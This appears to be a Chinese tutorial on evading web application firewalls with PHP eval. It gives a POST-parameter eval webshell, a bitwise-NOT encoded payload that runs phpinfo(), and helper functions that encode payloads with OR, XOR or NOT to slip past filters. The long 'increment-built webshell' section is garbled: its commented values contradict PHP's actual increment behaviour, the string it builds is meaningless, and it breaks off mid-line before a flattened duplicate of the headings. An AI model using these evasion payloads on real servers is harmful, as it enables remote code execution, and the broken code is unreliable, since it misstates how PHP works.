绕过铁waf的好手--浅谈多语言eval执行
字数 408 2025-08-22 12:22:37

多语言eval执行绕过WAF技术详解

1. eval与system函数基础

1.1 eval函数

  • 定义：eval()是一个语言结构,可以执行字符串中的代码并返回执行结果
  • PHP示例：
    eval($_POST[1]); // 通过POST参数执行任意代码
    
  • 功能：
    • 执行任意代码
    • 实现变量声明和覆盖
    • 执行系统命令

1.2 system函数

  • 定义：system()是一个函数,作为从语言代码执行到系统命令执行的桥梁
  • 示例：
    system("whoami"); // 执行系统命令
    system("php -r 'print 123;'"); // 在系统命令中执行PHP代码
    

2. PHP无字母数字RCE技术

2.1 基本运算绕过

  • 异或运算(^)
    $code = 'echo 5 ^ 3;'; eval($code); // 输出6
    
  • 取反运算(~)
    $code = 'echo ~5;'; eval($code); // 输出-6
    
  • 自增运算(++)
    $code = '$x = 5; $x++; echo $x;'; eval($code); // 输出6
    

2.2 取反编码示例

  • ~%8F%97%8F%96%91%99%90解码后执行phpinfo()
  • 当输入1=(~%8F%97%8F%96%91%99%90)();时,eval会将其运算为phpinfo();并执行

2.3 通用绕过脚本

或运算函数

function orRce($par1, $par2) {
    // Both operands are URL-decoded first, so the arithmetic is done on raw bytes.
    $left = urldecode($par1);
    $right = urldecode($par2);
    // PHP's `|` on two strings is a byte-wise OR; the decoded result is returned as-is.
    return $left | $right;
}

异或运算函数

function xorRce($par1, $par2) {
    // URL-decode each side, then XOR byte by byte (PHP `^` on strings is byte-wise).
    $decodedA = urldecode($par1);
    $decodedB = urldecode($par2);
    return $decodedA ^ $decodedB;
}

取反运算函数

function negateRce() {
    // Line terminators to strip from each interactive answer.
    $eol = array("\r\n", "\r", "\n");

    // Read two answers from STDIN, prompting on STDOUT before each one.
    fwrite(STDOUT, '[+]your function: ');
    $fnName = str_replace($eol, "", fgets(STDIN));
    fwrite(STDOUT, '[+]your command: ');
    $fnArg = str_replace($eol, "", fgets(STDIN));

    // Print the bitwise-NOT of each answer, URL-encoded, joined by ')(~'.
    // Because every byte is inverted, a filter that only matches the plaintext
    // names will not see them; inspection has to normalise `~`/percent-encoded bytes first.
    echo urlencode(~$fnName) . ')(~' . urlencode(~$fnArg);
}

生成器函数

function generate($mode, $preg='/[0-9]/i') {
    // Stub as given in the article: the body is intentionally empty and only the
    // intended interface is documented here.
    // $mode selects the encoding: 1 = OR, 2 = XOR, 3 = bitwise NOT.
    // $preg: presumably a PCRE pattern for characters that must not appear in the
    // output (default: ASCII digits) — confirm against the full script. Note the
    // `i` flag has no effect on a digit-only character class.
}

2.4 自增构造webshell

<?php
$_=[]; // 得到"Array"
$_=$_[''=='$']; // 得到"A"
$__=$_; // $__="A"
$___=$__; // $___="A"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // $__="P"
$___=$__; // $___="P"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // $__="^"
$___=$__; // $___="^"
$__=$_; // $__="A"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // $__="S"
$____=$__; // $____="S"
$__=$_; // $__="A"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // $__="T"
$____.=$__; // $____="ST"
$__=$_; // $__="A"
$____.=$__; // $____="STA"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // $__="U"
$____.=$__; // $____="STAU"
$__=$_; // $__="A"
$____.=$__; // $____="STAUA"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // $__="V"
$____.=$__; // $____="STAUAV"
$__=$_; // $__="A"
$____.=$__; // $____="STAUAVA"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // $__="W"
$____.=$__; // $____="STAUAVAW"
$__=$_; // $__="A"
$____.=$__; // $____="STAUAVAWA"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // $__="X"
$____.=$__; // $____="STAUAVAWAX"
$__=$_; // $__="A"
$____.=$__; // $____="STAUAVAWAXA"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // $__="Y"
$____.=$__; // $____="STAUAVAWAXAY"
$__=$_; // $__="A"
$____.=$__; // $____="STAUAVAWAXAYA"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // $__="Z"
$____.=$__; // $____="STAUAVAWAXAYAZ"
$__=$_; // $__="A"
$____.=$__; // $____="STAUAVAWAXAYAZA"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // $__="["
$____.=$__; // $____="STAUAVAWAXAYAZA["
$__=$_; // $__="A"
$____.=$__; // $____="STAUAVAWAXAYAZA[A"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // $__="\"
$____.=$__; // $____="STAUAVAWAXAYAZA[\"
$__=$_; // $__="A"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // $__="]"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]"
$__=$_; // $__="A"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // $__="^"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A^"
$__=$_; // $__="A"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A^A"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // $__="_"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A^A_"
$__=$_; // $__="A"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A^A_A"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // $__="`"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A^A_A`"
$__=$_; // $__="A"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A^A_A`A"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // $__="a"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A^A_A`Aa"
$__=$_; // $__="A"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A^A_A`AaA"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // $__="b"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A^A_A`AaAb"
$__=$_; // $__="A"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A^A_A`AaAbA"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // $__="c"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A^A_A`AaAbAc"
$__=$_; // $__="A"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A^A_A`AaAbAcA"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // $__="d"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A^A_A`AaAbAcAd"
$__=$_; // $__="A"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A^A_A`AaAbAcAdA"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // $__="e"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A^A_A`AaAbAcAdAe"
$__=$_; // $__="A"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A^A_A`AaAbAcAdAeA"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // $__="f"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A^A_A`AaAbAcAdAeAf"
$__=$_; // $__="A"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A^A_A`AaAbAcAdAeAfA"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // $__="g"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A^A_A`AaAbAcAdAeAfAg"
$__=$_; // $__="A"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A^A_A`AaAbAcAdAeAfAgA"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // $__="h"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A^A_A`AaAbAcAdAeAfAgAh"
$__=$_; // $__="A"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A^A_A`AaAbAcAdAeAfAgAhA"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // $__="i"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A^A_A`AaAbAcAdAeAfAgAhAi"
$__=$_; // $__="A"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A^A_A`AaAbAcAdAeAfAgAhAiA"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // $__="j"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A^A_A`AaAbAcAdAeAfAgAhAiAj"
$__=$_; // $__="A"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A^A_A`AaAbAcAdAeAfAgAhAiAjA"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // $__="k"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A^A_A`AaAbAcAdAeAfAgAhAiAjAk"
$__=$_; // $__="A"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A^A_A`AaAbAcAdAeAfAgAhAiAjAkA"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // $__="l"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A^A_A`AaAbAcAdAeAfAgAhAiAjAkAl"
$__=$_; // $__="A"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A^A_A`AaAbAcAdAeAfAgAhAiAjAkAlA"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // $__="m"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A^A_A`AaAbAcAdAeAfAgAhAiAjAkAlAm"
$__=$_; // $__="A"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A^A_A`AaAbAcAdAeAfAgAhAiAjAkAlAmA"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$
多语言eval执行绕过WAF技术详解 1. eval与system函数基础 1.1 eval函数 定义 : eval() 是一个语言结构,可以执行字符串中的代码并返回执行结果 PHP示例 : 功能 : 执行任意代码 实现变量声明和覆盖 执行系统命令 1.2 system函数 定义 : system() 是一个函数,作为从语言代码执行到系统命令执行的桥梁 示例 : 2. PHP无字母数字RCE技术 2.1 基本运算绕过 异或运算(^) : 取反运算(~) : 自增运算(++) : 2.2 取反编码示例 ~%8F%97%8F%96%91%99%90 解码后执行 phpinfo() 当输入 1=(~%8F%97%8F%96%91%99%90)(); 时,eval会将其运算为 phpinfo(); 并执行 2.3 通用绕过脚本 或运算函数 异或运算函数 取反运算函数 生成器函数 2.4 自增构造webshell